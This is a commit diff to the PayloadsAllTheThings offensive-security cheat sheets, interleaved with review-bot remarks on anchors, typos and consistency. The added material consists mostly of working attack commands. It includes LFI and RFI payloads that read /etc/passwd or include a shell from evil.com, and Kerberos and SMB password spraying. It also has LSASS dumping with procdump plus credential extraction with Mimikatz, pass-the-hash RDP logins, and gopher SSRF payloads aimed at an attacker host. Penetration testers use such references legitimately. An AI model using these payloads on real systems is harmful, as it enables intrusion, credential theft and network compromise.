mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp
This commit is contained in:
parent 765c615efe
commit bab04f8587
@ -7,6 +7,10 @@
## Summary

* [Basic LFI](#basic-lfi)
* [Null byte](#null-byte)
* [Double encoding](#double-encoding)
* [Path truncation](#path-truncation)
* [Filter bypass tricks](#filter-bypass-tricks)
* [Basic RFI](#basic-rfi)
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
* [Wrapper php://filter](#wrapper-phpfilter)
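Review bot: the new Summary entries cover only the four LFI subsections, while the RFI part of this same change (further down in this diff) introduces its own `### Null byte` and `### Double encoding` headings that get no Summary entry. Because those repeat the LFI heading text, their auto-generated anchors will not be `#null-byte` / `#double-encoding` but a suffixed variant (`#null-byte-1` on GitHub). Either add entries for them under `* [Basic RFI](#basic-rfi)` with the suffixed anchors, or give the RFI headings distinct text so the anchors are unambiguous.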
@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director
http://example.com/index.php?page=../../../etc/passwd
```

Null byte
### Null byte

```powershell
http://example.com/index.php?page=../../../etc/passwd%00
```

Double encoding
### Double encoding

```powershell
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```

Path truncation
### Path truncation

On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.

```powershell
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE]
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
```

Filter bypass tricks
### Filter bypass tricks

```powershell
http://example.com/index.php?page=....//....//etc/passwd
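Review bot: the Path truncation sentence `On most PHP installations a filename longer than 4096 bytes will be cut off` is the only explanation the three payloads below it get, and `most PHP installations` is not something a reader can act on; since the payloads only work where that truncation happens, state which PHP versions or configurations it applies to, or at least mark it as version-dependent. Style: the fences for these URL lists are tagged `powershell` although they contain only URLs; a plain or `http`-tagged fence would be more accurate.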
@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
http://example.com/index.php?page=http://evil.com/shell.txt
```

Null byte
### Null byte

```powershell
http://example.com/index.php?page=http://evil.com/shell.txt%00
```

Double encoding
### Double encoding

```powershell
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
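Review bot: `### Null byte` and `### Double encoding` here reuse heading text already used under Basic LFI earlier in this diff, so readers following the `#null-byte` and `#double-encoding` links from the Summary will always land on the LFI variants, never on these. Suggest `### Null byte (RFI)` and `### Double encoding (RFI)`, or a deeper heading level, plus a matching Summary entry for each.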
@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
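Review bot: the added reference uses a different date style (`Jun 20, 2018`) from the first entry in this list (`14 Aug 2018`); align it, e.g. `20 Jun 2018`, so the list reads consistently.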
@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
enum4linux | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas:
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.

Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
```

### PassTheTicket Golden Tickets
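Review bot: the two new sentences (`There are 3-4 fields that seem to be common in most AD schemas:` and the attribute list) sit inside the code fence that closes after the `Get-WmiObject` line, so they render as code rather than prose; move them above the fence or prefix them with `#`. They also do not connect to either command around them: `enum4linux | grep -i desc` and the WMI query both read the `Description` field, while the sentence names LDAP attributes (`UserPassword`, `UnixUserPassword`, `unicodePwd`, `msSFU30Password`) that neither command retrieves. Give an LDAP query that requests those attributes, or drop the sentence.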
@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module

### Password spraying

Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.

Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.

```powershell
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
```

Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.

```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```

Most of the time the best passwords to spray are :

- Password1
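Review bot: the new `crackmapexec smb 10.0.0.1/24 -u Administrator -p ...` example does the opposite of what the paragraph above it defines: it fixes one user (`Administrator`) and loops a generated password list over it, which is a brute force against a single account and will hit exactly the lockout threshold that spraying one password across many users is meant to avoid. Either turn it into a user list with one password, matching the `kerbrute passwordspray` line, or relabel it as brute force. Also, the `?a` mask in `Pass@wor?l?a` emits candidates containing spaces and shell metacharacters, and the unquoted backtick substitution word-splits those into separate arguments; write the candidates to a file first and hand that file to `-p`.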
@ -8,6 +8,7 @@
* The Harvester

* [Active Recon](#active-recon)
* Masscan
* Nmap
* Nmap Script
* RPCClient
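Review bot: `* Masscan` is added to the Summary as plain text like its siblings, but the section it refers to (added later in this diff under `## Active recon`) is also a bullet, `* Masscan`, rather than a heading, so there is nothing a link could anchor to. If the Summary is meant to be navigable, promote the Active recon entries to headings and link them the way `[Active Recon](#active-recon)` is linked.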
@ -47,6 +48,13 @@

## Active recon

* Masscan

```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
```

* Basic NMAP

```bash
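Review bot: the second masscan line (`masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000`) writes no output file while the first uses `-oL masscan.out`; a full TCP and UDP sweep is not something you want to repeat, so add `-oL` or `-oJ` there as well. A one-line comment per command (what `--only-open` drops, why the interface is pinned with `-e tun0` and the rate lowered on the second line) would also bring this block in line with the commented Nmap examples that follow.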
@ -1,38 +1,14 @@
# Network Discovery

## Netdiscover
## Summary

```powershell
netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts

20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
```

## Responder

```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```

Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)

## Bettercap

```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```
- [Nmap](#nmap)
- [Masscan](#masscan)
- [Netdiscover](#netdiscover)
- [Responder](#responder)
- [Bettercap](#bettercap)
- [Reconnoitre](#reconnoitre)
- [References](#references)

## Nmap

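Review bot: this hunk removes the Netdiscover, Responder and Bettercap sections only to re-add them unchanged at the end of the file, so two typos travel with the move: `targetting` in the Bettercap comment and `better cap` for the tool name. Fix them in the re-added copy while it is being touched. The new Summary uses `-` bullets where the Methodology Summary edited in this same commit uses `*`; pick one style.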
@ -121,6 +97,13 @@ Host script results:
List Nmap scripts : ls /usr/share/nmap/scripts/
```

## Masscan

```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
```

## Reconnoitre

Dependencies:
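Review bot: the `## Masscan` block added here is the same two commands added to the Methodology and Enumeration page in this commit; duplicated snippets drift the first time one copy is corrected. Keep the commands in one place (this file is the natural home) and link to it from the Methodology bullet, or at least note that the two must be kept in sync.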
@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
If you have a segfault with nbtscan, read the following quote.
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255

## Netdiscover

```powershell
netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts

20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
```

## Responder

```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```

Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)

## Bettercap

```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```

## References

* [TODO](TODO)
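Review bot: `## References` with `* [TODO](TODO)` ships a broken link, and the Summary added at the top of this file now points at it; either fill the section with the sources this page already relies on (the Responder-Windows repository is one) or leave it out until there is content. In the moved quote, `here.So` is missing the space after the period.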
@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
## Spawn TTY Shell

Access shortcuts, su, nano and autocomplete in a partially tty shell

/!\ OhMyZSH might break this trick, a simple `sh` is recommended

> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect

```powershell
ctrl+z
echo $TERM && tput lines && tput cols

# for bash
stty raw -echo
fg

# for zsh
stty raw -echo; fg

reset
export SHELL=bash
export TERM=xterm-256color
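Review bot: the blockquote explaining why zsh needs `stty raw -echo; fg` on one line has no source; since it is presented as a quotation, put the link it was taken from next to it, as the rest of this page does for borrowed material. Minor: `export SHELL=bash` should be an absolute path (`export SHELL=/bin/bash`) so programs that exec `$SHELL` do not depend on `PATH` in the upgraded shell.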
@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
```

## Mimikatz - Mini Dump

Dump the lsass process.

```powershell
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

Then load it inside Mimikatz.

```powershell
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
```

## Mimikatz Golden ticket

```powershell
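Review bot: in the second fence, `Switch to minidump` is Mimikatz's reply to `sekurlsa::minidump lsass.dmp`, not a command, yet it is typeset like the two `mimikatz #` lines; drop it or mark it as output so nobody types it. Two caveats belong next to the dump step: `net use Z: https://live.sysinternals.com` only works when the WebClient (WebDAV) service is running on the host, and the `.dmp` must be parsed by a Mimikatz of the same architecture as the LSASS that produced it, so say where the file is expected to be copied before the `sekurlsa::minidump` step.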
@ -119,18 +119,20 @@ or with crackmapexec
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
```

For Server 2012 R2, Win8.1+

```powershell
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
```

with Metasploit
or with Metasploit

```powershell
run getgui -u admin -p 1234
```

Then log in using xfreerdp

```powershell
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
xfreerd /u:runner /v:10.0.0.1 # password will be asked
```


## Netuse (Windows)

```powershell
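Review bot: the second command in the new `Then log in using xfreerdp` block is misspelled: `xfreerd /u:runner /v:10.0.0.1` must be `xfreerdp /u:runner /v:10.0.0.1`. The trailing comment on the first line (`pass the hash works for Server 2012 R2 / Win 8.1+`) preserves what the removed `For Server 2012 R2, Win8.1+` paragraph said, so nothing is lost there, but the sample host changes from `192.168.1.12` to `10.0.0.1` while the crackmapexec line above still targets `192.168.1.100`; use one lab address throughout the section.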
@ -1,4 +1,20 @@
# OAuth 2 - Common vulnerabilities
# OAuth

## Summary

- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
- [OAuth private key disclosure](#oauth-private-key-disclosure)
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
- [Cross-Site Request Forgery](#cross-site-request-forgery)
- [References](#references)

## Stealing OAuth Token via referer

From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.

> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer

## Grabbing OAuth Token via redirect_uri

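Review bot: two Summary anchors, `#grabbing-oauth-token-via-redirect---uri` and `#executing-xss-via-redirect---uri`, encode `redirect_uri` as `---`, but the heading visible below reads `## Grabbing OAuth Token via redirect_uri`, and GitHub's slug keeps the underscore (`#grabbing-oauth-token-via-redirect_uri`), so those two links will not resolve there. Generate the anchors with the renderer this repository targets and verify them by clicking before merging.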
@ -2,7 +2,7 @@

A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques !
I <3 pull requests :)
I :heart: pull requests :)

You can also contribute with a beer IRL or with `buymeacoffee.com`

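Review bot: `:heart:` is a GitHub emoji shortcode; renderers that do not expand shortcodes (some Markdown previewers and mirrors) will print it literally, whereas the previous `<3` rendered everywhere. If the emoji is wanted without that dependency, use the Unicode character itself.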
@ -277,6 +277,13 @@ You didn't say the magic word !
QUIT
```

#### Gopher HTTP

```powershell
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
```

#### Gopher SMTP - Back connect to 1337

```php
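Review bot: the two gopher payloads are inconsistent with each other: the GET line leaves its spaces and the placeholder `<attacker:80>` unencoded (compare `%20` and `<attacker>:80` on the POST line), so a literal copy is not a valid URL. Both also terminate request lines with `%0A` alone; HTTP expects `%0D%0A`, and while many servers tolerate a bare LF, using `%0D%0A` in both avoids relying on that leniency.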
@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
- he is able to make stored XSS from a irrelevant domain to main facebook domain
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
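Review bot: one line is dropped from this reference list but the rendered diff does not show which; if the bullet `- he is able to make stored XSS from a irrelevant domain to main facebook domain` survives, it needs `an irrelevant` and should be indented under the Whitton entry it comments on, since at top level it reads as a reference entry of its own.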